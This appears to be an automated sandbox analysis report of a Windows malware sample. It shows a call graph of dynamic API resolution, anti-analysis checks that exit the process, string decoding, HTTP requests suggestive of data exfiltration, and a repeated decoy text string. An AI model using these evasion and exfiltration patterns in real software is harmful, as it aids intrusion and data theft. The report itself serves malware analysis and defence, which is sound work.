37202 bd4610 2 API calls 37201->37202 37203 bd3cfd 37202->37203 37204 bd4610 2 API calls 37203->37204 37205 bd3d16 37204->37205 37206 bd4610 2 API calls 37205->37206 37207 bd3d2f 37206->37207 37208 bd4610 2 API calls 37207->37208 37209 bd3d48 37208->37209 37210 bd4610 2 API calls 37209->37210 37211 bd3d61 37210->37211 37212 bd4610 2 API calls 37211->37212 37213 bd3d7a 37212->37213 37214 bd4610 2 API calls 37213->37214 37215 bd3d93 37214->37215 37216 bd4610 2 API calls 37215->37216 37217 bd3dac 37216->37217 37218 bd4610 2 API calls 37217->37218 37219 bd3dc5 37218->37219 37220 bd4610 2 API calls 37219->37220 37221 bd3dde 37220->37221 37222 bd4610 2 API calls 37221->37222 37223 bd3df7 37222->37223 37224 bd4610 2 API calls 37223->37224 37225 bd3e10 37224->37225 37226 bd4610 2 API calls 37225->37226 37227 bd3e29 37226->37227 37228 bd4610 2 API calls 37227->37228 37229 bd3e42 37228->37229 37230 bd4610 2 API calls 37229->37230 37231 bd3e5b 37230->37231 37232 bd4610 2 API calls 37231->37232 37233 bd3e74 37232->37233 37234 bd4610 2 API calls 37233->37234 37235 bd3e8d 37234->37235 37236 bd4610 2 API calls 37235->37236 37237 bd3ea6 37236->37237 37238 bd4610 2 API calls 37237->37238 37239 bd3ebf 37238->37239 37240 bd4610 2 API calls 37239->37240 37241 bd3ed8 37240->37241 37242 bd4610 2 API calls 37241->37242 37243 bd3ef1 37242->37243 37244 bd4610 2 API calls 37243->37244 37245 bd3f0a 37244->37245 37246 bd4610 2 API calls 37245->37246 37247 bd3f23 37246->37247 37248 bd4610 2 API calls 37247->37248 37249 bd3f3c 37248->37249 37250 bd4610 2 API calls 37249->37250 37251 bd3f55 37250->37251 37252 bd4610 2 API calls 37251->37252 37253 bd3f6e 37252->37253 37254 bd4610 2 API calls 37253->37254 37255 bd3f87 37254->37255 37256 bd4610 2 API calls 37255->37256 37257 bd3fa0 37256->37257 37258 bd4610 2 API calls 37257->37258 37259 bd3fb9 37258->37259 37260 bd4610 2 API calls 37259->37260 37261 bd3fd2 37260->37261 37262 bd4610 2 API calls 37261->37262 37263 bd3feb 37262->37263 37264 bd4610 2 API calls 37263->37264 37265 bd4004 37264->37265 37266 bd4610 2 API calls 37265->37266 37267 bd401d 37266->37267 37268 bd4610 2 API calls 37267->37268 37269 bd4036 37268->37269 37270 bd4610 2 API calls 37269->37270 37271 bd404f 37270->37271 37272 bd4610 2 API calls 37271->37272 37273 bd4068 37272->37273 37274 bd4610 2 API calls 37273->37274 37275 bd4081 37274->37275 37276 bd4610 2 API calls 37275->37276 37277 bd409a 37276->37277 37278 bd4610 2 API calls 37277->37278 37279 bd40b3 37278->37279 37280 bd4610 2 API calls 37279->37280 37281 bd40cc 37280->37281 37282 bd4610 2 API calls 37281->37282 37283 bd40e5 37282->37283 37284 bd4610 2 API calls 37283->37284 37285 bd40fe 37284->37285 37286 bd4610 2 API calls 37285->37286 37287 bd4117 37286->37287 37288 bd4610 2 API calls 37287->37288 37289 bd4130 37288->37289 37290 bd4610 2 API calls 37289->37290 37291 bd4149 37290->37291 37292 bd4610 2 API calls 37291->37292 37293 bd4162 37292->37293 37294 bd4610 2 API calls 37293->37294 37295 bd417b 37294->37295 37296 bd4610 2 API calls 37295->37296 37297 bd4194 37296->37297 37298 bd4610 2 API calls 37297->37298 37299 bd41ad 37298->37299 37300 bd4610 2 API calls 37299->37300 37301 bd41c6 37300->37301 37302 bd4610 2 API calls 37301->37302 37303 bd41df 37302->37303 37304 bd4610 2 API calls 37303->37304 37305 bd41f8 37304->37305 37306 bd4610 2 API calls 37305->37306 37307 bd4211 37306->37307 37308 bd4610 2 API calls 37307->37308 37309 bd422a 37308->37309 37310 bd4610 2 API calls 37309->37310 37311 bd4243 37310->37311 37312 bd4610 2 API calls 37311->37312 37313 bd425c 37312->37313 37314 bd4610 2 API calls 37313->37314 37315 bd4275 37314->37315 37316 bd4610 2 API calls 37315->37316 37317 bd428e 37316->37317 37318 bd4610 2 API calls 37317->37318 37319 bd42a7 37318->37319 37320 bd4610 2 API calls 37319->37320 37321 bd42c0 37320->37321 37322 bd4610 2 API calls 37321->37322 37323 bd42d9 37322->37323 37324 bd4610 2 API calls 37323->37324 37325 bd42f2 37324->37325 37326 bd4610 2 API calls 37325->37326 37327 bd430b 37326->37327 37328 bd4610 2 API calls 37327->37328 37329 bd4324 37328->37329 37330 bd4610 2 API calls 37329->37330 37331 bd433d 37330->37331 37332 bd4610 2 API calls 37331->37332 37333 bd4356 37332->37333 37334 bd4610 2 API calls 37333->37334 37335 bd436f 37334->37335 37336 bd4610 2 API calls 37335->37336 37337 bd4388 37336->37337 37338 bd4610 2 API calls 37337->37338 37339 bd43a1 37338->37339 37340 bd4610 2 API calls 37339->37340 37341 bd43ba 37340->37341 37342 bd4610 2 API calls 37341->37342 37343 bd43d3 37342->37343 37344 bd4610 2 API calls 37343->37344 37345 bd43ec 37344->37345 37346 bd4610 2 API calls 37345->37346 37347 bd4405 37346->37347 37348 bd4610 2 API calls 37347->37348 37349 bd441e 37348->37349 37350 bd4610 2 API calls 37349->37350 37351 bd4437 37350->37351 37352 bd4610 2 API calls 37351->37352 37353 bd4450 37352->37353 37354 bd4610 2 API calls 37353->37354 37355 bd4469 37354->37355 37356 bd4610 2 API calls 37355->37356 37357 bd4482 37356->37357 37358 bd4610 2 API calls 37357->37358 37359 bd449b 37358->37359 37360 bd4610 2 API calls 37359->37360 37361 bd44b4 37360->37361 37362 bd4610 2 API calls 37361->37362 37363 bd44cd 37362->37363 37364 bd4610 2 API calls 37363->37364 37365 bd44e6 37364->37365 37366 bd4610 2 API calls 37365->37366 37367 bd44ff 37366->37367 37368 bd4610 2 API calls 37367->37368 37369 bd4518 37368->37369 37370 bd4610 2 API calls 37369->37370 37371 bd4531 37370->37371 37372 bd4610 2 API calls 37371->37372 37373 bd454a 37372->37373 37374 bd4610 2 API calls 37373->37374 37375 bd4563 37374->37375 37376 bd4610 2 API calls 37375->37376 37377 bd457c 37376->37377 37378 bd4610 2 API calls 37377->37378 37379 bd4595 37378->37379 37380 bd4610 2 API calls 37379->37380 37381 bd45ae 37380->37381 37382 bd4610 2 API calls 37381->37382 37383 bd45c7 37382->37383 37384 bd4610 2 API calls 37383->37384 37385 bd45e0 37384->37385 37386 bd4610 2 API calls 37385->37386 37387 bd45f9 37386->37387 37388 be9f20 37387->37388 37389 bea346 8 API calls 37388->37389 37390 be9f30 43 API calls 37388->37390 37391 bea3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37389->37391 37392 bea456 37389->37392 37390->37389 37391->37392 37393 bea526 37392->37393 37394 bea463 8 API calls 37392->37394 37395 bea52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37393->37395 37396 bea5a8 37393->37396 37394->37393 37395->37396 37397 bea647 37396->37397 37398 bea5b5 6 API calls 37396->37398 37399 bea72f 37397->37399 37400 bea654 9 API calls 37397->37400 37398->37397 37401 bea738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37399->37401 37402 bea7b2 37399->37402 37400->37399 37401->37402 37403 bea7ec 37402->37403 37404 bea7bb GetProcAddress GetProcAddress 37402->37404 37405 bea825 37403->37405 37406 bea7f5 GetProcAddress GetProcAddress 37403->37406 37404->37403 37407 bea922 37405->37407 37408 bea832 10 API calls 37405->37408 37406->37405 37409 bea98d 37407->37409 37410 bea92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37407->37410 37408->37407 37411 bea9ae 37409->37411 37412 bea996 GetProcAddress 37409->37412 37410->37409 37413 be5ef3 37411->37413 37414 bea9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37411->37414 37412->37411 37415 bd1590 37413->37415 37414->37413 37685 bd16b0 37415->37685 37418 beaab0 lstrcpy 37419 bd15b5 37418->37419 37420 beaab0 lstrcpy 37419->37420 37421 bd15c7 37420->37421 37422 beaab0 lstrcpy 37421->37422 37423 bd15d9 37422->37423 37424 beaab0 lstrcpy 37423->37424 37425 bd1663 37424->37425 37426 be5760 37425->37426 37427 be5771 37426->37427 37428 beab30 2 API calls 37427->37428 37429 be577e 37428->37429 37430 beab30 2 API calls 37429->37430 37431 be578b 37430->37431 37432 beab30 2 API calls 37431->37432 37433 be5798 37432->37433 37434 beaa50 lstrcpy 37433->37434 37435 be57a5 37434->37435 37436 beaa50 lstrcpy 37435->37436 37437 be57b2 37436->37437 37438 beaa50 lstrcpy 37437->37438 37439 be57bf 37438->37439 37440 beaa50 lstrcpy 37439->37440 37480 be57cc 37440->37480 37441 be5893 StrCmpCA 37441->37480 37442 be58f0 StrCmpCA 37443 be5a2c 37442->37443 37442->37480 37444 beabb0 lstrcpy 37443->37444 37445 be5a38 37444->37445 37446 beab30 2 API calls 37445->37446 37448 be5a46 37446->37448 37447 beab30 lstrlen lstrcpy 37447->37480 37450 beab30 2 API calls 37448->37450 37449 be5aa6 StrCmpCA 37451 be5be1 37449->37451 37449->37480 37454 be5a55 37450->37454 37455 beabb0 lstrcpy 37451->37455 37452 beaa50 lstrcpy 37452->37480 37453 beaab0 lstrcpy 37453->37480 37457 bd16b0 lstrcpy 37454->37457 37456 be5bed 37455->37456 37459 beab30 2 API calls 37456->37459 37479 be5a61 37457->37479 37458 bd1590 lstrcpy 37458->37480 37460 be5bfb 37459->37460 37463 beab30 2 API calls 37460->37463 37461 be5c5b StrCmpCA 37464 be5c78 37461->37464 37465 be5c66 Sleep 37461->37465 37462 be5510 25 API calls 37462->37480 37466 be5c0a 37463->37466 37467 beabb0 lstrcpy 37464->37467 37465->37480 37469 bd16b0 lstrcpy 37466->37469 37470 be5c84 37467->37470 37468 beabb0 lstrcpy 37468->37480 37469->37479 37471 beab30 2 API calls 37470->37471 37472 be5c93 37471->37472 37473 beab30 2 API calls 37472->37473 37475 be5ca2 37473->37475 37474 be59da StrCmpCA 37474->37480 37476 bd16b0 lstrcpy 37475->37476 37476->37479 37477 be5b8f StrCmpCA 37477->37480 37478 be5440 20 API calls 37478->37480 37479->36533 37480->37441 37480->37442 37480->37447 37480->37449 37480->37452 37480->37453 37480->37458 37480->37461 37480->37462 37480->37468 37480->37474 37480->37477 37480->37478 37482 be76dc 37481->37482 37483 be76e3 GetVolumeInformationA 37481->37483 37482->37483 37484 be7721 37483->37484 37485 be778c GetProcessHeap RtlAllocateHeap 37484->37485 37486 be77b8 wsprintfA 37485->37486 37487 be77a9 37485->37487 37489 beaa50 lstrcpy 37486->37489 37488 beaa50 lstrcpy 37487->37488 37490 be5ff7 37488->37490 37489->37490 37490->36554 37492 beaab0 lstrcpy 37491->37492 37493 bd48e9 37492->37493 37694 bd4800 37493->37694 37495 bd48f5 37496 beaa50 lstrcpy 37495->37496 37497 bd4927 37496->37497 37498 beaa50 lstrcpy 37497->37498 37499 bd4934 37498->37499 37500 beaa50 lstrcpy 37499->37500 37501 bd4941 37500->37501 37502 beaa50 lstrcpy 37501->37502 37503 bd494e 37502->37503 37504 beaa50 lstrcpy 37503->37504 37505 bd495b InternetOpenA StrCmpCA 37504->37505 37506 bd4994 37505->37506 37507 bd4f1b InternetCloseHandle 37506->37507 37700 be8cf0 37506->37700 37508 bd4f38 37507->37508 37715 bda210 CryptStringToBinaryA 37508->37715 37510 bd49b3 37708 beac30 37510->37708 37513 bd49c6 37515 beabb0 lstrcpy 37513->37515 37520 bd49cf 37515->37520 37516 beab30 2 API calls 37517 bd4f55 37516->37517 37519 beacc0 4 API calls 37517->37519 37518 bd4f77 codecvt 37522 beaab0 lstrcpy 37518->37522 37521 bd4f6b 37519->37521 37524 beacc0 4 API calls 37520->37524 37523 beabb0 lstrcpy 37521->37523 37535 bd4fa7 37522->37535 37523->37518 37525 bd49f9 37524->37525 37526 beabb0 lstrcpy 37525->37526 37527 bd4a02 37526->37527 37528 beacc0 4 API calls 37527->37528 37529 bd4a21 37528->37529 37530 beabb0 lstrcpy 37529->37530 37531 bd4a2a 37530->37531 37532 beac30 3 API calls 37531->37532 37533 bd4a48 37532->37533 37534 beabb0 lstrcpy 37533->37534 37536 bd4a51 37534->37536 37535->36557 37537 beacc0 4 API calls 37536->37537 37538 bd4a70 37537->37538 37539 beabb0 lstrcpy 37538->37539 37540 bd4a79 37539->37540 37541 beacc0 4 API calls 37540->37541 37542 bd4a98 37541->37542 37543 beabb0 lstrcpy 37542->37543 37544 bd4aa1 37543->37544 37545 beacc0 4 API calls 37544->37545 37546 bd4acd 37545->37546 37547 beac30 3 API calls 37546->37547 37548 bd4ad4 37547->37548 37549 beabb0 lstrcpy 37548->37549 37550 bd4add 37549->37550 37551 bd4af3 InternetConnectA 37550->37551 37551->37507 37552 bd4b23 HttpOpenRequestA 37551->37552 37554 bd4f0e InternetCloseHandle 37552->37554 37555 bd4b78 37552->37555 37554->37507 37556 beacc0 4 API calls 37555->37556 37557 bd4b8c 37556->37557 37558 beabb0 lstrcpy 37557->37558 37559 bd4b95 37558->37559 37560 beac30 3 API calls 37559->37560 37561 bd4bb3 37560->37561 37562 beabb0 lstrcpy 37561->37562 37563 bd4bbc 37562->37563 37564 beacc0 4 API calls 37563->37564 37565 bd4bdb 37564->37565 37566 beabb0 lstrcpy 37565->37566 37567 bd4be4 37566->37567 37568 beacc0 4 API calls 37567->37568 37569 bd4c05 37568->37569 37570 beabb0 lstrcpy 37569->37570 37571 bd4c0e 37570->37571 37572 beacc0 4 API calls 37571->37572 37573 bd4c2e 37572->37573 37574 beabb0 lstrcpy 37573->37574 37575 bd4c37 37574->37575 37576 beacc0 4 API calls 37575->37576 37577 bd4c56 37576->37577 37578 beabb0 lstrcpy 37577->37578 37579 bd4c5f 37578->37579 37580 beac30 3 API calls 37579->37580 37581 bd4c7d 37580->37581 37582 beabb0 lstrcpy 37581->37582 37583 bd4c86 37582->37583 37584 beacc0 4 API calls 37583->37584 37585 bd4ca5 37584->37585 37586 beabb0 lstrcpy 37585->37586 37587 bd4cae 37586->37587 37588 beacc0 4 API calls 37587->37588 37589 bd4ccd 37588->37589 37590 beabb0 lstrcpy 37589->37590 37591 bd4cd6 37590->37591 37592 beac30 3 API calls 37591->37592 37593 bd4cf4 37592->37593 37594 beabb0 lstrcpy 37593->37594 37595 bd4cfd 37594->37595 37596 beacc0 4 API calls 37595->37596 37597 bd4d1c 37596->37597 37598 beabb0 lstrcpy 37597->37598 37599 bd4d25 37598->37599 37600 beacc0 4 API calls 37599->37600 37601 bd4d46 37600->37601 37602 beabb0 lstrcpy 37601->37602 37603 bd4d4f 37602->37603 37604 beacc0 4 API calls 37603->37604 37605 bd4d6f 37604->37605 37606 beabb0 lstrcpy 37605->37606 37607 bd4d78 37606->37607 37608 beacc0 4 API calls 37607->37608 37609 bd4d97 37608->37609 37610 beabb0 lstrcpy 37609->37610 37611 bd4da0 37610->37611 37612 beac30 3 API calls 37611->37612 37613 bd4dbe 37612->37613 37614 beabb0 lstrcpy 37613->37614 37615 bd4dc7 37614->37615 37616 beaa50 lstrcpy 37615->37616 37617 bd4de2 37616->37617 37618 beac30 3 API calls 37617->37618 37619 bd4e03 37618->37619 37620 beac30 3 API calls 37619->37620 37621 bd4e0a 37620->37621 37622 beabb0 lstrcpy 37621->37622 37623 bd4e16 37622->37623 37624 bd4e37 lstrlen 37623->37624 37625 bd4e4a 37624->37625 37626 bd4e53 lstrlen 37625->37626 37714 beade0 37626->37714 37628 bd4e63 HttpSendRequestA 37629 bd4e82 InternetReadFile 37628->37629 37630 bd4eb7 InternetCloseHandle 37629->37630 37635 bd4eae 37629->37635 37633 beab10 37630->37633 37632 beacc0 4 API calls 37632->37635 37633->37554 37634 beabb0 lstrcpy 37634->37635 37635->37629 37635->37630 37635->37632 37635->37634 37721 beade0 37636->37721 37638 be1a14 StrCmpCA 37639 be1a1f ExitProcess 37638->37639 37640 be1a27 37638->37640 37641 be1c12 37640->37641 37642 be1b1f StrCmpCA 37640->37642 37643 be1afd StrCmpCA 37640->37643 37644 be1acf StrCmpCA 37640->37644 37645 be1aad StrCmpCA 37640->37645 37646 be1b82 StrCmpCA 37640->37646 37647 be1b63 StrCmpCA 37640->37647 37648 be1bc0 StrCmpCA 37640->37648 37649 be1b41 StrCmpCA 37640->37649 37650 be1ba1 StrCmpCA 37640->37650 37651 beab30 lstrlen lstrcpy 37640->37651 37641->36559 37642->37640 37643->37640 37644->37640 37645->37640 37646->37640 37647->37640 37648->37640 37649->37640 37650->37640 37651->37640 37652->36565 37653->36567 37654->36573 37655->36575 37656->36581 37657->36583 37658->36587 37659->36591 37660->36595 37661->36601 37662->36603 37663->36607 37664->36621 37665->36625 37666->36624 37667->36620 37668->36624 37669->36639 37670->36628 37671->36630 37672->36633 37673->36636 37674->36641 37675->36648 37676->36651 37677->36657 37678->36678 37679->36682 37680->36681 37681->36677 37682->36681 37683->36691 37686 beaab0 lstrcpy 37685->37686 37687 bd16c3 37686->37687 37688 beaab0 lstrcpy 37687->37688 37689 bd16d5 37688->37689 37690 beaab0 lstrcpy 37689->37690 37691 bd16e7 37690->37691 37692 beaab0 lstrcpy 37691->37692 37693 bd15a3 37692->37693 37693->37418 37695 bd4816 37694->37695 37696 bd4888 lstrlen 37695->37696 37720 beade0 37696->37720 37698 bd4898 InternetCrackUrlA 37699 bd48b7 37698->37699 37699->37495 37701 beaa50 lstrcpy 37700->37701 37702 be8d04 37701->37702 37703 beaa50 lstrcpy 37702->37703 37704 be8d12 GetSystemTime 37703->37704 37706 be8d29 37704->37706 37705 beaab0 lstrcpy 37707 be8d8c 37705->37707 37706->37705 37707->37510 37710 beac41 37708->37710 37709 beac98 37711 beaab0 lstrcpy 37709->37711 37710->37709 37712 beac78 lstrcpy lstrcat 37710->37712 37713 beaca4 37711->37713 37712->37709 37713->37513 37714->37628 37716 bda249 LocalAlloc 37715->37716 37717 bd4f3e 37715->37717 37716->37717 37718 bda264 CryptStringToBinaryA 37716->37718 37717->37516 37717->37518 37718->37717 37719 bda289 LocalFree 37718->37719 37719->37717 37720->37698 37721->37638

                                    Executed Functions

                                    Function 00BE9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 be9bb0-be9bc4 call be9aa0 663 be9bca-be9dde call be9ad0 GetProcAddress * 21 660->663 664 be9de3-be9e42 LoadLibraryA * 5 660->664 663->664 666 be9e5d-be9e64 664->666 667 be9e44-be9e58 GetProcAddress 664->667 669 be9e96-be9e9d 666->669 670 be9e66-be9e91 GetProcAddress * 2 666->670 667->666 671 be9e9f-be9eb3 GetProcAddress 669->671 672 be9eb8-be9ebf 669->672 670->669 671->672 673 be9ed9-be9ee0 672->673 674 be9ec1-be9ed4 GetProcAddress 672->674 675 be9ee2-be9f0c GetProcAddress * 2 673->675 676 be9f11-be9f12 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,018B2148), ref: 00BE9BF1
                                    • GetProcAddress.KERNEL32(74DD0000,018B21F0), ref: 00BE9C0A
                                    • GetProcAddress.KERNEL32(74DD0000,018B2178), ref: 00BE9C22
                                    • GetProcAddress.KERNEL32(74DD0000,018B22B0), ref: 00BE9C3A
                                    • GetProcAddress.KERNEL32(74DD0000,018B2190), ref: 00BE9C53
                                    • GetProcAddress.KERNEL32(74DD0000,018B8E00), ref: 00BE9C6B
                                    • GetProcAddress.KERNEL32(74DD0000,018A60D0), ref: 00BE9C83
                                    • GetProcAddress.KERNEL32(74DD0000,018A6430), ref: 00BE9C9C
                                    • GetProcAddress.KERNEL32(74DD0000,018B22C8), ref: 00BE9CB4
                                    • GetProcAddress.KERNEL32(74DD0000,018B1FE0), ref: 00BE9CCC
                                    • GetProcAddress.KERNEL32(74DD0000,018B1FF8), ref: 00BE9CE5
                                    • GetProcAddress.KERNEL32(74DD0000,018B2010), ref: 00BE9CFD
                                    • GetProcAddress.KERNEL32(74DD0000,018A62D0), ref: 00BE9D15
                                    • GetProcAddress.KERNEL32(74DD0000,018B2028), ref: 00BE9D2E
                                    • GetProcAddress.KERNEL32(74DD0000,018B2040), ref: 00BE9D46
                                    • GetProcAddress.KERNEL32(74DD0000,018A60F0), ref: 00BE9D5E
                                    • GetProcAddress.KERNEL32(74DD0000,018B21A8), ref: 00BE9D77
                                    • GetProcAddress.KERNEL32(74DD0000,018B2058), ref: 00BE9D8F
                                    • GetProcAddress.KERNEL32(74DD0000,018A6230), ref: 00BE9DA7
                                    • GetProcAddress.KERNEL32(74DD0000,018B21C0), ref: 00BE9DC0
                                    • GetProcAddress.KERNEL32(74DD0000,018A6310), ref: 00BE9DD8
                                    • LoadLibraryA.KERNEL32(018B2340,?,00BE6CA0), ref: 00BE9DEA
                                    • LoadLibraryA.KERNEL32(018B23A0,?,00BE6CA0), ref: 00BE9DFB
                                    • LoadLibraryA.KERNEL32(018B2370,?,00BE6CA0), ref: 00BE9E0D
                                    • LoadLibraryA.KERNEL32(018B22E0,?,00BE6CA0), ref: 00BE9E1F
                                    • LoadLibraryA.KERNEL32(018B22F8,?,00BE6CA0), ref: 00BE9E30
                                    • GetProcAddress.KERNEL32(75A70000,018B2388), ref: 00BE9E52
                                    • GetProcAddress.KERNEL32(75290000,018B2358), ref: 00BE9E73
                                    • GetProcAddress.KERNEL32(75290000,018B2310), ref: 00BE9E8B
                                    • GetProcAddress.KERNEL32(75BD0000,018B2328), ref: 00BE9EAD
                                    • GetProcAddress.KERNEL32(75450000,018A6390), ref: 00BE9ECE
                                    • GetProcAddress.KERNEL32(76E90000,018B8D60), ref: 00BE9EEF
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00BE9F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00BE9EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 74f2e7ba59a793f284fc2e2650b4ecfad9f5fb30b8c6ef08adf0897ff79baa06
                                    • Instruction ID: 456349d0ecbfa078bf59605b0433c5eae62a3ba0f8a84c8b47a20e1086a99be0
                                    • Opcode Fuzzy Hash: 74f2e7ba59a793f284fc2e2650b4ecfad9f5fb30b8c6ef08adf0897ff79baa06
                                    • Instruction Fuzzy Hash: 45A152B66092009FC344DF6BEC88A667BF9A79F341714851AB989E3270D734B94DCF60
                                    Function 00BD4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 bd4610-bd46e5 RtlAllocateHeap 781 bd46f0-bd46f6 764->781 782 bd46fc-bd479a 781->782 783 bd479f-bd47f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD465E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BD47EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD46D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD47B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BD4707
                                    Memory Dump Source
